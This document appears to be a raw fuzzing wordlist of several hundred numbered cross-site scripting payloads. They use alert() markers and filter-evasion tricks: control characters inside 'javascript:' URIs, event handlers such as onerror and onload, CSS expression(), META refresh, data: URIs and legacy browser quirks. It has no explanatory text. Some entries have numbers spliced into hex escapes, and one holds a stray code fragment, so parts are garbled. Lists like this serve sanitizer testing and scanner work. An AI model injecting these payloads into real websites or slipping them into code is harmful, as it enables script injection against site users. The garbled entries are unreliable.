<a href="javas\x0Acript:javascript:alert(369)" id="fuzzelement369">test</a>
<a href="javas\x08cript:javascript:alert(370)" id="fuzzelement370">test</a>
<a href="javas\x02cript:javascript:alert(371)" id="fuzzelement371">test</a>
<a href="javas\x03cript:javascript:alert(372)" id="fuzzelement372">test</a>
<a href="javas\x04cript:javascript:alert(373)" id="fuzzelement373">test</a>
<a href="javas\x0374cript:javascript:alert(374)" id="fuzzelement374">test</a>
<a href="javas\x05cript:javascript:alert(375)" id="fuzzelement375">test</a>
<a href="javas\x0Bcript:javascript:alert(376)" id="fuzzelement376">test</a>
<a href="javas\x09cript:javascript:alert(377)" id="fuzzelement377">test</a>
<a href="javas\x06cript:javascript:alert(378)" id="fuzzelement378">test</a>
<a href="javas\x0Ccript:javascript:alert(379)" id="fuzzelement379">test</a>
<script>/* *\x2A/javascript:alert(380)// */</script>
<script>/* *\x00/javascript:alert(381)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(382)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(383)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(384)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(385)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(386)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(387);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(388);/*';">DEF
<script>if("x\\xE389\x96\x89".length==2) { javascript:alert(389);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(390);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(391);}</script>
'`"><\x3Cscript>javascript:alert(392)</script>
'`"><\x00script>javascript:alert(393)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(394)>
"'`><\x00img src=xxx:x onerror=javascript:alert(395)>
<script src="data:text/plain\x2Cjavascript:alert(396)"></script>
<script src="data:\xD4\x8F,javascript:alert(397)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(398)"></script>
<script src="data:\xCB\x8F,javascript:alert(399)"></script>
<script\x20type="text/javascript">javascript:alert(400);</script>
<script\x3Etype="text/javascript">javascript:alert(401);</script>
<script\x0Dtype="text/javascript">javascript:alert(402);</script>
<script\x09type="text/javascript">javascript:alert(403);</script>
<script\x0Ctype="text/javascript">javascript:alert(404);</script>
<script\x2Ftype="text/javascript">javascript:alert(405);</script>
<script\x0Atype="text/javascript">javascript:alert(406);</script>
ABC<div style="x\x3Aexpression(javascript:alert(407)">DEF
ABC<div style="x:expression\x5C(javascript:alert(408)">DEF
ABC<div style="x:expression\x00(javascript:alert(409)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(410)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(411)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(412)">DEF
ABC<div style="x:\x09expression(javascript:alert(413)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(414)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(415)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(416)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(417)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(418)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(419)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(420)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(421)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(422)">DEF
ABC<div style="x:\x20expression(javascript:alert(423)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(424)">DEF
ABC<div style="x:\x00expression(javascript:alert(425)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(426)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(427)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(428)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(429)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(430)">DEF
ABC<div style="x:\xE2\x80\x8431expression(javascript:alert(431)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(432)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(433)">DEF
<a href="\x0Bjavascript:javascript:alert(434)" id="fuzzelement434">test</a>
<a href="\x0Fjavascript:javascript:alert(435)" id="fuzzelement435">test</a>
<a href="\xC2\xA0javascript:javascript:alert(436)" id="fuzzelement436">test</a>
<a href="\x05javascript:javascript:alert(437)" id="fuzzelement437">test</a>
<a href="\xE438\xA0\x8Ejavascript:javascript:alert(438)" id="fuzzelement438">test</a>
<a href="\x4398javascript:javascript:alert(439)" id="fuzzelement439">test</a>
<a href="\x440440javascript:javascript:alert(440)" id="fuzzelement440">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(441)" id="fuzzelement441">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(442)" id="fuzzelement442">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(443)" id="fuzzelement443">test</a>
<a href="\x4447javascript:javascript:alert(444)" id="fuzzelement444">test</a>
<a href="\x03javascript:javascript:alert(445)" id="fuzzelement445">test</a>
<a href="\x0Ejavascript:javascript:alert(446)" id="fuzzelement446">test</a>
<a href="\x447Ajavascript:javascript:alert(447)" id="fuzzelement447">test</a>
<a href="\x00javascript:javascript:alert(448)" id="fuzzelement448">test</a>
<a href="\x4490javascript:javascript:alert(449)" id="fuzzelement449">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(450)" id="fuzzelement450">test</a>
<a href="\x20javascript:javascript:alert(451)" id="fuzzelement451">test</a>
<a href="\x4523javascript:javascript:alert(452)" id="fuzzelement452">test</a>
<a href="\x09javascript:javascript:alert(453)" id="fuzzelement453">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(454)" id="fuzzelement454">test</a>
<a href="\x4554javascript:javascript:alert(455)" id="fuzzelement455">test</a>
<a href="\x4569javascript:javascript:alert(456)" id="fuzzelement456">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(457)" id="fuzzelement457">test</a>
<a href="\x458Fjavascript:javascript:alert(458)" id="fuzzelement458">test</a>
<a href="\xE2\x80\x8459javascript:javascript:alert(459)" id="fuzzelement459">test</a>
<a href="\x460Djavascript:javascript:alert(460)" id="fuzzelement460">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(461)" id="fuzzelement461">test</a>
<a href="\x07javascript:javascript:alert(462)" id="fuzzelement462">test</a>
<a href="\xE463\x9A\x80javascript:javascript:alert(463)" id="fuzzelement463">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(464)" id="fuzzelement464">test</a>
<a href="\x04javascript:javascript:alert(465)" id="fuzzelement465">test</a>
<a href="\x0466javascript:javascript:alert(466)" id="fuzzelement466">test</a>
<a href="\x08javascript:javascript:alert(467)" id="fuzzelement467">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(468)" id="fuzzelement468">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(469)" id="fuzzelement469">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(470)" id="fuzzelement470">test</a>
<a href="\x4712javascript:javascript:alert(471)" id="fuzzelement471">test</a>
<a href="\x0Djavascript:javascript:alert(472)" id="fuzzelement472">test</a>
<a href="\x0Ajavascript:javascript:alert(473)" id="fuzzelement473">test</a>
<a href="\x0Cjavascript:javascript:alert(474)" id="fuzzelement474">test</a>
<a href="\x4755javascript:javascript:alert(475)" id="fuzzelement475">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(476)" id="fuzzelement476">test</a>
<a href="\x4776javascript:javascript:alert(477)" id="fuzzelement477">test</a>
<a href="\x02javascript:javascript:alert(478)" id="fuzzelement478">test</a>
<a href="\x479Bjavascript:javascript:alert(479)" id="fuzzelement479">test</a>
<a href="\x06javascript:javascript:alert(480)" id="fuzzelement480">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(481)" id="fuzzelement481">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(482)" id="fuzzelement482">test</a>
<a href="\x483Ejavascript:javascript:alert(483)" id="fuzzelement483">test</a>
<a href="\xE2\x8484\x9Fjavascript:javascript:alert(484)" id="fuzzelement484">test</a>
<a href="\x485Cjavascript:javascript:alert(485)" id="fuzzelement485">test</a>
<a href="javascript\x00:javascript:alert(486)" id="fuzzelement486">test</a>
<a href="javascript\x3A:javascript:alert(487)" id="fuzzelement487">test</a>
<a href="javascript\x09:javascript:alert(488)" id="fuzzelement488">test</a>
<a href="javascript\x0D:javascript:alert(489)" id="fuzzelement489">test</a>
<a href="javascript\x0A:javascript:alert(490)" id="fuzzelement490">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(491)>
`"'><img src=xxx:x \x22onerror=javascript:alert(492)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(493)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(494)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(495)>
`"'><img src=xxx:x \x09onerror=javascript:alert(496)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(497)>
`"'><img src=xxx:x \x00onerror=javascript:alert(498)>
`"'><img src=xxx:x \x27onerror=javascript:alert(499)>
`"'><img src=xxx:x \x20onerror=javascript:alert(500)>
"`'><script>\x3Bjavascript:alert(501)</script>
"`'><script>\x0Djavascript:alert(502)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(503)</script>
"`'><script>\xE2\x80\x8504javascript:alert(504)</script>
"`'><script>\xE2\x80\x84javascript:alert(505)</script>
"`'><script>\xE3\x80\x80javascript:alert(506)</script>
"`'><script>\x09javascript:alert(507)</script>
"`'><script>\xE2\x80\x89javascript:alert(508)</script>
"`'><script>\xE2\x80\x85javascript:alert(509)</script>
"`'><script>\xE2\x80\x88javascript:alert(510)</script>
"`'><script>\x00javascript:alert(511)</script>
"`'><script>\xE2\x80\xA8javascript:alert(512)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(513)</script>
"`'><script>\xE514\x9A\x80javascript:alert(514)</script>
"`'><script>\x0Cjavascript:alert(515)</script>
"`'><script>\x2Bjavascript:alert(516)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(517)</script>
"`'><script>-javascript:alert(518)</script>
"`'><script>\x0Ajavascript:alert(519)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(520)</script>
"`'><script>\x7Ejavascript:alert(521)</script>
"`'><script>\xE2\x80\x87javascript:alert(522)</script>
"`'><script>\xE2\x8523\x9Fjavascript:alert(523)</script>
"`'><script>\xE2\x80\xA9javascript:alert(524)</script>
"`'><script>\xC2\x85javascript:alert(525)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(526)</script>
"`'><script>\xE2\x80\x83javascript:alert(527)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(528)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(529)</script>
"`'><script>\xE2\x80\x80javascript:alert(530)</script>
"`'><script>\x2531javascript:alert(531)</script>
"`'><script>\xE2\x80\x82javascript:alert(532)</script>
"`'><script>\xE2\x80\x86javascript:alert(533)</script>
"`'><script>\xE534\xA0\x8Ejavascript:alert(534)</script>
"`'><script>\x0Bjavascript:alert(535)</script>
"`'><script>\x20javascript:alert(536)</script>
"`'><script>\xC2\xA0javascript:alert(537)</script>
"/><img/onerror=\x0Bjavascript:alert(538)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(539)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(540)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(541)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(542)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(543)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(544)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(545)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(546)\x20src=xxx:x />
<script\x2F>javascript:alert(547)</script>
<script\x20>javascript:alert(548)</script>
<script\x0D>javascript:alert(549)</script>
<script\x0A>javascript:alert(550)</script>
<script\x0C>javascript:alert(551)</script>
<script\x00>javascript:alert(552)</script>
<script\x09>javascript:alert(553)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(554)>
`"'><img src=xxx:x onerror\x00=javascript:alert(555)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(556)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(557)>
`"'><img src=xxx:x onerror\x20=javascript:alert(558)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(559)>
`"'><img src=xxx:x onerror\x09=javascript:alert(560)>
<script>javascript:alert(561)<\x00/script>
<img src=# onerror\x3D"javascript:alert(562)"
<input onfocus=javascript:alert(563) autofocus>
<input onblur=javascript:alert(564) autofocus><input autofocus>
<video poster=javascript:javascript:alert(565)//
<body onscroll=javascript:alert(566)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(567)><input></form><button form=test onformchange=javascript:alert(567)>X
<video><source onerror="javascript:javascript:alert(568)">
<video onerror="javascript:javascript:alert(569)"><source>
<form><button formaction="javascript:javascript:alert(570)">X
<body oninput=javascript:alert(571)><input autofocus>
<math href="javascript:javascript:alert(572)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(572)">CLICKME</maction> </math>
<frameset onload=javascript:alert(573)>
<table background="javascript:javascript:alert(574)">
<!--<img src="--><img src=x onerror=javascript:alert(575)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(576))//">
<![><img src="]><img src=x onerror=javascript:alert(577)//">
<style><img src="</style><img src=x onerror=javascript:alert(578)//">
<li style=list-style:url() onerror=javascript:alert(579)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(579)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(580)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(581)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-582582D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(582)"></OBJECT>
<b <script>alert(583)</script>0
<div id="div584"><input value="``onmouseover=javascript:alert(584)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div584").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(585)//'>
<embed src="javascript:alert(586)">
<img src="javascript:alert(587)">
<image src="javascript:alert(588)">
<script src="javascript:alert(589)">
<div style=width:590px;filter:glow onfilterchange=javascript:alert(590)>x
<? foo="><script>javascript:alert(591)</script>">
<! foo="><script>javascript:alert(592)</script>">
</ foo="><script>javascript:alert(593)</script>">
<? foo="><x foo='?><script>javascript:alert(594)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(595)</script>">
<% foo><x foo="%><script>javascript:alert(596)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(597)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(598)">
<img \x47src=x onerror="javascript:alert(599)">
<img \x600600src=x onerror="javascript:alert(600)">
<img \x6012src=x onerror="javascript:alert(601)">
<img\x47src=x onerror="javascript:alert(602)">
<img\x6030src=x onerror="javascript:alert(603)">
<img\x6043src=x onerror="javascript:alert(604)">
<img\x32src=x onerror="javascript:alert(605)">
<img\x47src=x onerror="javascript:alert(606)">
<img\x607607src=x onerror="javascript:alert(607)">
<img \x47src=x onerror="javascript:alert(608)">
<img \x34src=x onerror="javascript:alert(609)">
<img \x39src=x onerror="javascript:alert(610)">
<img \x00src=x onerror="javascript:alert(611)">
<img src\x09=x onerror="javascript:alert(612)">
<img src\x6130=x onerror="javascript:alert(613)">
<img src\x6143=x onerror="javascript:alert(614)">
<img src\x32=x onerror="javascript:alert(615)">
<img src\x6162=x onerror="javascript:alert(616)">
<img src\x617617=x onerror="javascript:alert(617)">
<img src\x00=x onerror="javascript:alert(618)">
<img src\x47=x onerror="javascript:alert(619)">
<img src=x\x09onerror="javascript:alert(620)">
<img src=x\x6210onerror="javascript:alert(621)">
<img src=x\x622622onerror="javascript:alert(622)">
<img src=x\x6232onerror="javascript:alert(623)">
<img src=x\x6243onerror="javascript:alert(624)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(625)">
<img src=x onerror=\x09"javascript:alert(626)">
<img src=x onerror=\x6270"javascript:alert(627)">
<img src=x onerror=\x628628"javascript:alert(628)">
<img src=x onerror=\x6292"javascript:alert(629)">
<img src=x onerror=\x32"javascript:alert(630)">
<img src=x onerror=\x00"javascript:alert(631)">
<a href=javaɸ򚜸ᢲscript:javascript:alert(632)>XXX</a>
<img src="x` `<script>javascript:alert(633)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(634)//">
<title onpropertychange=javascript:alert(635)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(636)></a>">
<!--[if]><script>javascript:alert(637)</script -->
<!--[if<img src=x onerror=javascript:alert(638)//]> -->
<object id="x" classid="clsid:CB927D6392-4FF7-4a9e-A63969-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C6397-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(639)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(640)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(641)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(642))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(643))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(644);">XXX</a></a><a href="javascript:javascript:alert(644)">XXX</a>
<// style=x:expression\28javascript:alert(645)\29>
<style>*{x:expression(javascript:alert(646))}</style>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(647));">X
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(648)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(649))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(650)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(651)')()</script>
<meta charset="mac-farsi">¼script¾javascript:alert(652)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(653)` >
654<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh䙔vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(654)>`>
655<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(655)>>
656<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(656) strokecolor=white strokeweight=656000px from=0 to=656000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(657)">XXX</a>
<event-source src="%(event)s" onload="javascript:alert(658)">
<a href="javascript:javascript:alert(659)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img򡒴src=x:x򡒴onerror򡒴=javascript:alert(660)>">
<script>javascript:alert(661)</script>
<IMG SRC="javascript:javascript:alert(662);">
<IMG SRC=javascript:javascript:alert(663)>
<IMG SRC=`javascript:javascript:alert(664)`>
<FRAMESET><FRAME SRC="javascript:javascript:alert(665);"></FRAMESET>
<BODY ONLOAD=javascript:alert(666)>
<BODY ONLOAD=javascript:javascript:alert(667)>
<IMG SRC="jav ascript:javascript:alert(668);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(669)>
<IMG SRC="javascript:javascript:alert(670)"
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(671);">
<IMG DYNSRC="javascript:javascript:alert(672)">
<IMG LOWSRC="javascript:javascript:alert(673)">
<BGSOUND SRC="javascript:javascript:alert(674);">
<BR SIZE="&{javascript:alert(675)}">
<LINK REL="stylesheet" HREF="javascript:javascript:alert(676);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(677)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(678);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(679);">
<IFRAME SRC="javascript:javascript:alert(680);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(681)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(682)">
<DIV STYLE="background-image: url(javascript:javascript:alert(683))">
<DIV STYLE="width:expression(javascript:alert(684));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(685))">
<XSS STYLE="xss:expression(javascript:alert(686))">
<STYLE TYPE="text/javascript">javascript:alert(687);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(688)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(689)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(690);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(691);//">
<OBJECT classid=clsid:ae24fdae-03c6-692692d692-8b76-0080c744f389><param name=url value=javascript:javascript:alert(692)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(693)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(694)</SCRIPT>"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:javascript:alert(695)">X
<body onscroll=javascript:alert(696)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(697)">
<STYLE>a{background:url('s698' 's2)}@import javascript:javascript:alert(698);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(699)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(700);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(701);></style>
<?xml version="702.0"?><html:html xmlns:html='http://www.w3.org/702999/xhtml'><html:script>javascript:alert(702);</html:script></html:html>
<embed code=javascript:javascript:alert(703);></embed>
<frameset onload=javascript:javascript:alert(704)></frameset>
<object onerror=javascript:javascript:alert(705)>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(706);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(707);};>
<a href="javAascript:javascript:alert(708)">test708</a>
<a href="javaascript:javascript:alert(709)">test709</a>
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(710)&gt;>">
';alert(711))//';alert(711))//";
alert(712))//";alert(712))//--
></SCRIPT>">'><SCRIPT>alert(713))</SCRIPT>
<IMG SRC="javascript:alert(714);">
<IMG SRC=javascript:alert(715)>
<IMG SRC=JaVaScRiPt:alert(716)>
<IMG SRC=javascript:alert(717)>
<IMG SRC=`javascript:alert(718)`>
<a onmouseover="alert(719)">xxs link</a>
<a onmouseover=alert(720)>xxs link</a>
<IMG """><SCRIPT>alert(721)</SCRIPT>">
<IMG SRC=javascript:alert(722))>
<IMG SRC=# onmouseover="alert(723)">
<IMG SRC= onmouseover="alert(724)">
<IMG onmouseover="alert(725)">
<IMG SRC="jav ascript:alert(726);">
<IMG SRC="jav	ascript:alert(727);">
<IMG SRC="jav
ascript:alert(728);">
<IMG SRC="jav
ascript:alert(729);">
perl -e 'print "<IMG SRC=java\0script:alert(730)>";' > out
<IMG SRC="  javascript:alert(731);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(732)>
<<SCRIPT>alert(733);//<</SCRIPT>
<IMG SRC="javascript:alert(734)"
\";alert(735);//
</TITLE><SCRIPT>alert(736);</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(737);">
<BODY BACKGROUND="javascript:alert(738)">
<IMG DYNSRC="javascript:alert(739)">
<IMG LOWSRC="javascript:alert(740)">
<STYLE>li {list-style-image: url("javascript:alert(741)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert(742)>
<BGSOUND SRC="javascript:alert(743);">
<BR SIZE="&{alert(744)}">
<LINK REL="stylesheet" HREF="javascript:alert(745);">
<STYLE>@im\port'\ja\vasc\ript:alert(746)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(747))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(748))'>
<STYLE TYPE="text/javascript">alert(749);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(750)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(751)")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert(752)")}</STYLE>
<XSS STYLE="xss:expression(alert(753))">
¼script¾alert(754)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(755);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(756);">
<IFRAME SRC="javascript:alert(757);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(758)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(759);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(760)">
<TABLE><TD BACKGROUND="javascript:alert(761)">
<DIV STYLE="background-image: url(javascript:alert(762))">
<DIV STYLE="background-image: url(javascript:alert(763))">
<DIV STYLE="width: expression(alert(764));">
<BASE HREF="javascript:alert(765);//">
<? echo('<SCR)';echo('IPT>alert(766)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(767)</SCRIPT>"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(768);+ADw-/SCRIPT+AD4-
<img src=`%00`
 onerror=alert(769)

<script /*%00*/>/*%00*/alert(770)/*%00*/</script /*%00*/
<iframe/src="data:text/html,<svg ��load=alert(771)>">
<meta content="
 772 
; JAVASCRIPT: alert(772)" http-equiv="refresh"/>
<form><iframe 	Ḳ򼺍 src="javascript:alert(773)"򼺍Ḳ	;>
http://www.google<script .com>alert(774)</script
<script ^__^>alert(775))</script ^__^
</style  ><script   :-(>/**/alert(776)/**/</script   :-(
�</form><input type᩹"date" onfocus="alert(777)">
<a href="javascript:void(0)" onmouseover=
javascript:alert(778)
>X</a>
<script ~~~>alert(779)</script ~~~>
<iframe/%00/ src=javaSCRIPT:alert(780)
<%<!--'%><script>alert(781);</script -->
<script src="data:text/javascript,alert(782)"></script>
<iframe/onreadystatechange=alert(783)
<svg/onload=alert(784)
<input type="text" value=`` <div/onmouseover='alert(785)'>X</div>
http://www.<script>alert(786)</script .com
<svg><script ?>alert(787)
<img src=`xx:xx`onerror=alert(788)>
<meta http-equiv="refresh" content="0;javascript:alert(789)"/>
<script>+-+-790-+-+alert(790)</script>
<body/onload=<!-->Ủalert(791)>
<script itworksinallbrowsers>/*<script* */alert(792)</script
<img src ?itworksonchrome?\/onerror = alert(793)
<svg><script onlypossibleinopera:-)> alert(794)
<script x> alert(795) </script 795=2
<div/onmouseover='alert(796)'> style="x:">
<--`<img/src=` onerror=alert(797)> --!>
<div style="position:absolute;top:0;left:0;width:79800%;height:79800%" onmouseover="prompt(798)" onclick="alert(798)">x</button>
<form><button formaction=javascript:alert(799)>CLICKME
‘; alert(800);
‘)alert(801);//
<ScRiPt>alert(802)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(803)>
<IMG SRC=”javascript:alert(804);”>
<IMG SRC=javascript:alert(805)>
<IMG SRC=javascript:alert(806)>
<img src=xss onerror=alert(807)>
<img src=`%00`
 onerror=alert(808)

<script /*%00*/>/*%00*/alert(809)/*%00*/</script /*%00*/
<iframe/src="data:text/html,<svg ��load=alert(810)>">
<meta content="
 811 
; JAVASCRIPT: alert(811)" http-equiv="refresh"/>
<form><iframe 	Ᾰ󆜌 src="javascript:alert(812)"󆜌Ᾰ	;>
http://www.google<script .com>alert(813)</script
<script ^__^>alert(814))</script ^__^
</style  ><script   :-(>/**/alert(815)/**/</script   :-(
�</form><input type᪠"date" onfocus="alert(816)">
<a href="javascript:void(0)" onmouseover=
javascript:alert(817)
>X</a>
<script ~~~>alert(818)</script ~~~>
<iframe/%00/ src=javaSCRIPT:alert(819)
<%<!--'%><script>alert(820);</script -->
<script src="data:text/javascript,alert(821)"></script>
<iframe/onreadystatechange=alert(822)
<svg/onload=alert(823)
<input type="text" value=`` <div/onmouseover='alert(824)'>X</div>
http://www.<script>alert(825)</script .com
<svg><script ?>alert(826)
<img src=`xx:xx`onerror=alert(827)>
<meta http-equiv="refresh" content="0;javascript:alert(828)"/>
